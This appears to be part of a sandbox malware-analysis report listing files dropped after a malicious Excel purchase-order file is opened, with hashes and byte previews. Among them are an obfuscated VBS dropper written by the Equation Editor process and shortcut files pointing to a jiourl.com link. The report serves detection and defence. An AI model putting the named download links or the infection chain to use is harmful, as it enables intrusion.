                                                  SHA-512:636B45781600A6095A3C869D4719BBB08ADA418F3A3AFF57E12E34BB61FCF90320224C82087D624C9F2EB806ACDC9CE7E77A851277C2E5FEFCD91CD424A6BC3C
                                                  Malicious:false
                                                  Preview:..........3.6.3.2.1.8.7.3.`.?.7.:.?./.5.@._.,.>.^.3.?.?.?...2...].9.%.3.0.'.!.......;.4.~.5.7.0...4.].,...:./.-./.:...1.3.0.|.6.=.!.(.....|.>.?.?.).*.[.$.?.8...`.:...2.].>.[.(.5.;.=.+.!.9.?.].-.|.9.>.>.*.&.,.-.3.#.%.!...9.%.!.%.+.>.?.?.;.'.3.^...:.'.[.:.?.7.,.^.?.^.[.>.0.$.].7.6.5.7.1.*.*...~.,...|.;.`.`.%.|.?.(.,.*.8.!.6.0./.@.2..._.[.>.7.>.|.4.+.1...?.:.?.#.+.*.*...^.5./.&.?.=.6.=.<.?.=.*.`.^.|._.+.=._.4.`.3.=.=.>.6.`.?.].?.3.%.?...9...,.,.6.:.[.?.?.#.5.9.~.....>.!...?.!.0.3.[._.`.4.].+.(.-.).?.2.$.?.&...,.?.8.:.8.&.3.0.2.,.#.?.1.?.?.@.3.4...[.~.%.?.9.$.6.:.,.....~.<._.?.,.)._.3.@.0.^.|.8.%...%.1.?.(.=.`.?.!.1.|.7.<.:.^.?.|.@.1.4.&.&.=.?.^.#.=.3.*.#.'.*.7...!.(.2.,.<.....1.:.?.^.=.8.=.).`.?...8.!.7.#.^.7.<.+.6.?.^...%...1.+.3.#.7...2.8.%.8./.'.,./.?...).3.[.'.6.%.4.&.<.$.:...:.[.(.9.7.9.].?.:.%.(...).?.-.5.5.1.2.~.?.0./.&...^.!.`...1./...?.:.5.*.5.].#.0...?.$._.<.2.|.9.#.`./._.2.1...?.&.`.!.8.9.)...$.#.6.>.!.`.>.(.<.%.<.].?.#.@._.(.'.$.6.%.%.7...9.>.?.?.%.|.,.2.7.?.[.$.;.?.%.......?.

                                                  C:\Users\user\AppData\Local\Temp\2893AGJN

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\find.exe
                                                  File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 10, database pages 37, cookie 0x2f, schema 4, UTF-8, version-valid-for 10
                                                  Category:dropped
                                                  Size (bytes):77824
                                                  Entropy (8bit):1.133993246026424
                                                  Encrypted:false
                                                  SSDEEP:96:LSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+S:uG8mZMDTJQb3OCaM0f6kL1Vumi
                                                  MD5:8BB4851AE9495C7F93B4D8A6566E64DB
                                                  SHA1:B16C29E9DBBC1E1FE5279D593811E9E317D26AF7
                                                  SHA-256:143AD87B1104F156950A14481112E79682AAD645687DF5E8C9232F4B2786D790
                                                  SHA-512:DDFD8A6243C2FC5EE7DAE2EAE8D6EA9A51268382730FA3D409A86165AB41386B0E13E4C2F2AC5556C9748E4A160D19B480D7B0EA23BA0671F921CB9E07637149
                                                  Malicious:false
                                                  Preview:SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\clmdqqno.ew0.psm1

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:very short file (no magic)
                                                  Category:dropped
                                                  Size (bytes):1
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3:U:U
                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                  Malicious:false
                                                  Preview:1

                                                  C:\Users\user\AppData\Local\Temp\gxjh-p60.zip

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\find.exe
                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                  Category:dropped
                                                  Size (bytes):445968
                                                  Entropy (8bit):7.99884320164708
                                                  Encrypted:true
                                                  SSDEEP:12288:qqKn7azHyK26Fre95sdYzb+tDYlK3uUNBsO3bhvh+eB9Ez:Q+zHc6FreBzsDYUJYCn+eB9Ez
                                                  MD5:0D1613320B79DE7E8C7627C07D19F4A7
                                                  SHA1:F85B78ED8568A648B9134BEB654E384C622C73BD
                                                  SHA-256:E6FC736D8850729EE5D9D65076E0F4A869530B2C5DF7239BDA47051FA3C04BE7
                                                  SHA-512:13C00D2A48A42C3DA05C6F475AB9B0581C951DD62CA0B435C44DBCEFDFC02F14597B2B33AA28D3C4C8526ADB198B24F1A83D92B12612209CA4AED06B80C7CBFA
                                                  Malicious:false
                                                  Preview:PK...........K..A.............sqlite3.defUT......Y...Yux.........d.......(...y.d....r.Tv.{sa,......=3O.......>..B............*..$...&.L....T...1..?..5.<....iUF.KO....b.>sU8...0[.....Y.Y.y$..p..8k.L.u+...5'.pb....I.D..)...t....!;....:....[....}u.t....#..Hj.#{...Xz2~us..C..L.a.M..`P;..| .......96b.. \.&...t.Y.....Z...N.`......nx(..s$..x.P..".Y..,h...H.>.qX.'#x.T.F.x.Txf.e.M.. .q.nW...iNF.D"....o.d.v.U...Qv(....c..D.=.....`..*......i.k.4.&^..5F.*..eA.....|..9.l.K.M..~............fI.;...f.1:....).K)\.....`r.[.4>..[Z.|..7.A..hE.Hm.rR..._p.R6.t.I.0y.['..#.Nx.I..7.K .P9......]..G...l.N..1.&...>......T} L.\.Kbu.=..c.`,.B.y.^.........G[A...{par...?..q6v^.aO..d-...O.[.v~....N$...$0...^.v...)T.+-..p.k.=.D...3"3`=Ha......,..1.F..7... .$z.H..z.c."k..9g'...p.-..2Y.A.z.....;..M9@el............~.U&q.........f-.K.cke.]..b.Xw..o).X.a.cq;.`.Ljy.....t.W.w...8.{.b.%.6n...t........R.WT8........E..q!......x...:...g..K...>...I-N.y.....{k..5...7]..v.......{....

                                                  C:\Users\user\AppData\Local\Temp\lkdpr2vr.wxa.ps1

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:very short file (no magic)
                                                  Category:dropped
                                                  Size (bytes):1
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3:U:U
                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                  Malicious:false
                                                  Preview:1

                                                  C:\Users\user\AppData\Local\Temp\pbvwahi5.zr3.psm1

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:very short file (no magic)
                                                  Category:dropped
                                                  Size (bytes):1
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3:U:U
                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                  Malicious:false
                                                  Preview:1

                                                  C:\Users\user\AppData\Local\Temp\q3nng2ih.xr3.ps1

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:very short file (no magic)
                                                  Category:dropped
                                                  Size (bytes):1
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3:U:U
                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                  Malicious:false
                                                  Preview:1

                                                  C:\Users\user\AppData\Local\Temp\sqlite3.def

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\find.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):5099
                                                  Entropy (8bit):4.34628563675731
                                                  Encrypted:false
                                                  SSDEEP:96:GcuN/gR+7Oc0XRMcCM3KOGOF++BlMtvr9NHY0ac:E/Q+7Oc0JKOBF++Evr9NHcc
                                                  MD5:248209B7183B5D5B667DFD77EE847763
                                                  SHA1:69B2CA31C9656E2B9BBB5A04CDB61047BED37F50
                                                  SHA-256:9FB7168694EBFA19383DE44AC8AA1B5341DEA5FC228DC7CCE8008C643807FDCE
                                                  SHA-512:108963CAFD9BC58FE0ACFB0A74D499549C275C523CB3E29ED4FA762DE0EBF9985B94AF414E29755808C5A19EBDDAA943B9DE8F68F7BD490145CE68DC6CCB7067
                                                  Malicious:false
                                                  Preview:EXPORTS.sqlite3_aggregate_context.sqlite3_aggregate_count.sqlite3_auto_extension.sqlite3_backup_finish.sqlite3_backup_init.sqlite3_backup_pagecount.sqlite3_backup_remaining.sqlite3_backup_step.sqlite3_bind_blob.sqlite3_bind_blob64.sqlite3_bind_double.sqlite3_bind_int.sqlite3_bind_int64.sqlite3_bind_null.sqlite3_bind_parameter_count.sqlite3_bind_parameter_index.sqlite3_bind_parameter_name.sqlite3_bind_pointer.sqlite3_bind_text.sqlite3_bind_text16.sqlite3_bind_text64.sqlite3_bind_value.sqlite3_bind_zeroblob.sqlite3_bind_zeroblob64.sqlite3_blob_bytes.sqlite3_blob_close.sqlite3_blob_open.sqlite3_blob_read.sqlite3_blob_reopen.sqlite3_blob_write.sqlite3_busy_handler.sqlite3_busy_timeout.sqlite3_cancel_auto_extension.sqlite3_changes.sqlite3_clear_bindings.sqlite3_close.sqlite3_close_v2.sqlite3_collation_needed.sqlite3_collation_needed16.sqlite3_column_blob.sqlite3_column_bytes.sqlite3_column_bytes16.sqlite3_column_count.sqlite3_column_database_name.sqlite3_column_database_name16.sqlite3_colum

                                                  C:\Users\user\AppData\Local\Temp\sqlite3.dll

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\find.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):851887
                                                  Entropy (8bit):6.5044934581559755
                                                  Encrypted:false
                                                  SSDEEP:24576:epcuaweNcfQL25VuB+wiPVoQClfhIC2/X4:epyweNcf9iB+/oQClZV
                                                  MD5:05ACE2F6D9BEF6FD9BBD05EE5262A1F2
                                                  SHA1:5CCE2228E0D9C6CC913CF551E0BF7C76ED74FF59
                                                  SHA-256:002459F4D4758011B4D7F36935F1FE323494B847F8C173A551076A3D30475EBC
                                                  SHA-512:1E717A66A72EB626727144FA7458F472ADA54FD1BE37072C9E740945E34BA94025737AEF44E54752C50C5B79A583C6A91A0D8043BF1BF7C3E7CAB8537207F9FC
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Joe Sandbox View:
                                                  • Filename: AWB# 6290868304.docx.doc, Detection: malicious, Browse
                                                  • Filename: RFQ-0122-07-2024.xls, Detection: malicious, Browse
                                                  • Filename: APR PAYROLL.doc, Detection: malicious, Browse
                                                  • Filename: SSLTD.xls, Detection: malicious, Browse
                                                  • Filename: 81304938_19012023_083155.xls, Detection: malicious, Browse
                                                  • Filename: ORDER SPECIFICATION.xlsx, Detection: malicious, Browse
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Y.*..m......!...............................a.......................................... ......................................@.......................P...0...........................0.......................................................text...............................`.P`.data...|...........................@.`..rdata..............................@.`@.bss..................................`..edata..............................@.0@.idata..............................@.0..CRT....,.... ......................@.0..tls.... ....0......................@.0..rsrc........@......................@.0..reloc...0...P...2..................@.0B/4...................$..............@.@B/19.................(..............@..B/31..........@......................@..B/45..........`......................@..B/57.................................@.0B/70.....i...............

                                                  C:\Users\user\AppData\Local\Temp\{A6FDB718-C337-4B18-AB5C-A4E46C6E305B}

                                                  Download File
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):131072
                                                  Entropy (8bit):0.025683810752253594
                                                  Encrypted:false
                                                  SSDEEP:6:I3DPcM3G49HvxggLRKxvvfVjRXv//4tfnRujlw//+GtluJ/eRuj:I3DP7GwPWx/nvYg3J/
                                                  MD5:186DB7206B15C6C5E688114C4A741D59
                                                  SHA1:D47A39580DD7D053BBADE5ABCA93EDC5FBCE9BA5
                                                  SHA-256:DE1DBAB948BC3EAF2875FBAC8EE16D2BB3CFE79C3415CECCE74795D495D4AE0E
                                                  SHA-512:C5DF95A77DC15D195FF143AB63F73542930976AF2E699EDEC7B97A4427A329783603777CAA2EB5E7F7FF50717EEB5B25DA12364224AA99C2D681BC7DC590956E
                                                  Malicious:false
                                                  Preview:......M.eFy...z,}G1'K.K.w._.u.QS,...X.F...Fa.q................................$..J.u:/.j..........>..#...L.an_..7.....................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\{D44B53F4-E272-4F86-8306-4E6CE031F8F1}

                                                  Download File
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):131072
                                                  Entropy (8bit):0.025617208667557248
                                                  Encrypted:false
                                                  SSDEEP:6:I3DPciWJzRvxggLR1yEWsZMDRXv//4tfnRujlw//+GtluJ/eRuj:I3DPXWJRJyENivYg3J/
                                                  MD5:6DDAAAAA360ECEDA788A57E813B6826C
                                                  SHA1:DF9A5875048449A81181F9565C4294890AD6A25F
                                                  SHA-256:F0D05A03A3F89DF516590EDF8459E7F2193AADC950843F2588E4219E57CD55E3
                                                  SHA-512:171BB7C63B3BB486DB0C2206231112FACCC96466A79865920F1C3C2415B4102AE6B97D3E2EF3C59CCA134517CBB3948415FA23996D965A3A18B717E5E36F089B
                                                  Malicious:false
                                                  Preview:......M.eFy...z.:.0.M..l...?.S,...X.F...Fa.q..............................?..O.....................N...q1.<......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\~DF1A861051F96DAF3C.TMP

                                                  Download File
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):512
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3::
                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                  Malicious:false
                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\~DF1E4EFF16FF5FFC92.TMP

                                                  Download File
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):512
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3::
                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                  Malicious:false
                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\~DF9EF225C0E73309A0.TMP

                                                  Download File
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):16384
                                                  Entropy (8bit):0.7294183343830343
                                                  Encrypted:false
                                                  SSDEEP:24:7aeSEeD93DS7WEJ3oSYGZnEzkofurju0F/GuguGFhhzoP7o9RIS:7aqeZ3gDJ3oSYcEGu0FxguGFzg7I
                                                  MD5:6BD2FAA735FC7AA162DAD3947E671162
                                                  SHA1:4BB0A43F630C574CC18256CF38577D61C963EA6A
                                                  SHA-256:7BA96E8B0592F4FCBA838941520FFEA88A6B2079DDDF1B47CF20BA4CA0EE2D59
                                                  SHA-512:2FCB5E3C13A15E3EDB482C957E94A75005186419AC5C772A9C64283EC5A43D49463A77B9BF8B4DB71CCF4898C2C27A5A7FD0F46B6490340CFB53997D7C9A9243
                                                  Malicious:false
                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\GmwgTs.url

                                                  Download File
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:MS Windows 95 Internet shortcut text (URL=<https://jiourl.com/GmwgTs>), ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):51
                                                  Entropy (8bit):4.735671665288803
                                                  Encrypted:false
                                                  SSDEEP:3:HRAbABGQYm2fpQX8To9v:HRYFVm4pQXv
                                                  MD5:31A04548F64193AE8C7FC70171E6B9E5
                                                  SHA1:84621289A204589396F32808D197AC437DEBDF0A
                                                  SHA-256:0685EAA839D0FB3EB1E2CE6A6CEDC7726515C4A00A4B89494F7CEE0B12C2D4E6
                                                  SHA-512:02D1391E20FE550A533DE497509EE65DD19F3EA7F3A0FC49AD4F3A78BE14D0956B6DFCEDFB074ECD1C7416950E5558969FFEA6018F4FF862B9873899EC721783
                                                  Malicious:true
                                                  Preview:[InternetShortcut]..URL=https://jiourl.com/GmwgTs..

                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

                                                  Download File
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:Generic INItialization configuration [xls]
                                                  Category:modified
                                                  Size (bytes):120
                                                  Entropy (8bit):4.970007272132442
                                                  Encrypted:false
                                                  SSDEEP:3:bDjxR08TeS5cGyqc+N2mMNGyqc+N2v:bsS5CBQo7BQI
                                                  MD5:CA199E1447EFBBC5CECF7DA6E523CDAA
                                                  SHA1:A35D4881BCD1A8293099690385C7AAC7FF028ED3
                                                  SHA-256:9A744FD6C409CDFB40FF91AC42549B4F74D25B5565D57BCD57D4C5AF8D675FB1
                                                  SHA-512:B38584252684D8686320235FCF91FAF7607F736DC035D6B59014AB8441533B437FCC5EDC8FA7532AFA656036AD89E7FC8E4B039C2B505CC4FC3D4348D0ACFC01
                                                  Malicious:false
                                                  Preview:[folders]..GmwgTs.url=0..jiourl.com.url=0..Mac Purchase Order PO102935.LNK=0..[xls]..Mac Purchase Order PO102935.LNK=0..

                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\jiourl.com.url

                                                  Download File
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:MS Windows 95 Internet shortcut text (URL=<https://jiourl.com/>), ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):45
                                                  Entropy (8bit):4.519087818311513
                                                  Encrypted:false
                                                  SSDEEP:3:HRAbABGQYm2fpQX8Tzvn:HRYFVm4pQX8vn
                                                  MD5:E05B943319E6F9A1A8E38A44581ED3E4
                                                  SHA1:BD654C9BAB745F39610DF27FB49E65C8156C00AF
                                                  SHA-256:2A86EA0D8D1F77B875CFD9A6CF7A35E1129DC9BF5B944603A145B4172E5578DC
                                                  SHA-512:06CE32E472801575F707F465C32CF69D37763C856E1DB26AECD2EE33BB988C5CB3BC8885A6A93745B2AA13E00D7E5CDDEA2653F8D682D2091314393FA2AABDAB
                                                  Malicious:true
                                                  Preview:[InternetShortcut]..URL=https://jiourl.com/..

                                                  C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

                                                  Download File
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):162
                                                  Entropy (8bit):2.503835550707525
                                                  Encrypted:false
                                                  SSDEEP:3:vrJlaCkWtVypil69oycWjUbtFJlln:vdsCkWtTl69oyjUvl
                                                  MD5:CB3D0F9D3F7204AF5670A294AB575B37
                                                  SHA1:5E792DFBAD5EDA9305FCF8F671F385130BB967D8
                                                  SHA-256:45968B9F50A9B4183FBF4987A106AB52EB3EF3279B2118F9AB01BA837DC3968A
                                                  SHA-512:BD116CAF3ACA40A5B90168A022C84923DB51630FA0E62E46020B71B8EB9613EAE776D476B0C6DE0D5F15642A74ED857765150F406937FBA5CB995E9FCDAC81AE
                                                  Malicious:false
                                                  Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\26QMPUB3.txt

                                                  Download File
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):72
                                                  Entropy (8bit):4.142768793411737
                                                  Encrypted:false
                                                  SSDEEP:3:X6RRWUv0j8T0cSMPWARqUeMzcg2/:qRRTcsVPWWJcg8
                                                  MD5:42C497CA9D3C44C20FF8F0480E135448
                                                  SHA1:AE4D0C5599B0B23E09ED077F12066FC35D0CE622
                                                  SHA-256:06A293D49B42F97F23A57D3E2056552E31B8F76347BC4A9375AB5872776E8A60
                                                  SHA-512:5A902A1617D0048CB7C30812F355D45F1B90AE4783D4FD46E257D5C0DEE02DC9D93204DE5A87A58A0B45C091B2834EBFEBEA948D630B3FCBB1171A7B47578838
                                                  Malicious:false
                                                  Preview:short_4447.1.jiourl.com/.9729.2325866496.31125424.1918695197.31125422.*.

                                                  C:\Users\user\AppData\Roaming\mekissedbutterburnwithstrong.vBS

                                                  Download File
                                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):182866
                                                  Entropy (8bit):3.862898281280299
                                                  Encrypted:false
                                                  SSDEEP:3072:B/xKUPE+y6rvwugt5pYGwKAyIxFnQ1IlwJCac29W4QcPnybeNdH+CciTXhMhv:/JPE+TwzAyIxFnQ1IlwJCac29W4Qczdc
                                                  MD5:D1E9E89D71457C35E8A8FF31EADFD642
                                                  SHA1:E2654F19CE0282BDB9FA8F4D10ADACB4ADFDFD87
                                                  SHA-256:5471914F742D78458A2D51C614477F695E79A6ED17156B2D735B7B3BEBCBE7D4
                                                  SHA-512:011F62153D1252ADC1A2793F014541ED8AC7B2753069FA66D809DC11AFAA1B64D768383AD4B3F7C0E97605DD28B2047C00C1AEA2DD8EA561026B8F4C013B73ED
                                                  Malicious:true
                                                  Preview:......J.x.A.b.K.W.G.z.A.R. .=. .".m.i.i.n.C.k.K.G.C.b.".....O.G.U.n.c.R.g.q.f.U. .=. .".L.K.P.o.z.z.J.z.c.G.".....x.K.c.G.r.R.c.c.c.l. .=. .".h.L.T.L.j.b.U.L.L.x.".....P.c.z.z.l.O.p.L.m.d. .=. .".z.c.i.L.a.p.x.O.B.j.".....k.W.A.k.o.W.K.N.K.i. .=. .".G.z.Z.a.a.i.A.L.G.N.".....Z.W.k.c.L.A.U.P.m.e. .=. .".U.K.W.W.A.p.K.W.l.h.".....L.o.i.i.L.I.z.g.t.t. .=. .".v.f.i.B.h.f.L.W.c.G.".........a.L.b.e.L.d.e.n.p.u. .=. .".L.U.o.i.q.N.s.l.B.B.".....f.W.Z.n.s.K.W.L.C.f. .=. .".x.n.W.f.K.i.C.B.z.a.".....K.W.q.n.x.j.A.R.i.L. .=. .".L.K.Z.a.c.Q.t.q.p.h.".....m.k.z.Z.K.k.U.i.p.K. .=. .".a.R.d.p.v.k.e.a.q.z.".....p.s.P.L.i.L.S.L.Q.W. .=. .".Q.N.W.m.e.L.O.G.S.U.".....K.h.i.W.W.k.b.p.a.H. .=. .".W.m.W.n.L.U.C.L.B.a.".....q.U.g.L.l.K.G.I.a.O. .=. .".L.z.S.W.N.p.K.W.g.G.".....R.R.i.s.G.U.k.z.c.c. .=. .".m.Z.z.h.s.f.Z.L.I.n.".....A.z.Z.W.K.W.U.i.i.G. .=. .".r.K.p.U.c.W.p.Q.k.G.".....J.G.i.U.l.i.h.t.e.o. .=. .".U.I.f.Q.A.h.p.n.k.o.".........L.c.o.o.W.S.L.A.h.J. .=. .".N.r.c.b.R.n.u.b.h.O.".....Z.u.A.z.R.n.N.

                                                  C:\Users\user\Desktop\5B430000

                                                  Download File
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Aug 16 08:33:00 2024, Security: 1
                                                  Category:dropped
                                                  Size (bytes):462336
                                                  Entropy (8bit):7.974639335817373
                                                  Encrypted:false
                                                  SSDEEP:12288:gWkj9sDorHgvWKX+92iXARJ8gc+CO4rTxUCVH:fkZsDorHgOUHiJT2CVH
                                                  MD5:59FB11A4C98E6F4F34C2F6CB431E76FC
                                                  SHA1:C9F309C5C686BB4CAEE94D96FF4AB7E066756236
                                                  SHA-256:DD687FF7E60CA05778DA53532110C9EABAA3461DA8BC24C210EE64CB14A5DF16
                                                  SHA-512:8D6858B732C59F2486211A76FF01EB22002EE093EF9959EC976838D253D2A5B4609A59816D7AB221AC9D6FE1F4C01E011C3CDC365EF11B31DFB3AC3ABF319A74
                                                  Malicious:false
                                                  Preview:......................>...................................8...................z.......|.......~........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...............;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...{...

                                                  C:\Users\user\Desktop\5B430000:Zone.Identifier

                                                  Download File
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):26
                                                  Entropy (8bit):3.95006375643621
                                                  Encrypted:false
                                                  SSDEEP:3:ggPYV:rPYV
                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                  Malicious:false
                                                  Preview:[ZoneTransfer]....ZoneId=0

                                                  C:\Users\user\Desktop\Mac Purchase Order PO102935.xls (copy)

                                                  Download File
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Aug 16 08:33:00 2024, Security: 1
                                                  Category:dropped
                                                  Size (bytes):462336
                                                  Entropy (8bit):7.974639335817373
                                                  Encrypted:false
                                                  SSDEEP:12288:gWkj9sDorHgvWKX+92iXARJ8gc+CO4rTxUCVH:fkZsDorHgOUHiJT2CVH
                                                  MD5:59FB11A4C98E6F4F34C2F6CB431E76FC
                                                  SHA1:C9F309C5C686BB4CAEE94D96FF4AB7E066756236
                                                  SHA-256:DD687FF7E60CA05778DA53532110C9EABAA3461DA8BC24C210EE64CB14A5DF16
                                                  SHA-512:8D6858B732C59F2486211A76FF01EB22002EE093EF9959EC976838D253D2A5B4609A59816D7AB221AC9D6FE1F4C01E011C3CDC365EF11B31DFB3AC3ABF319A74
                                                  Malicious:true
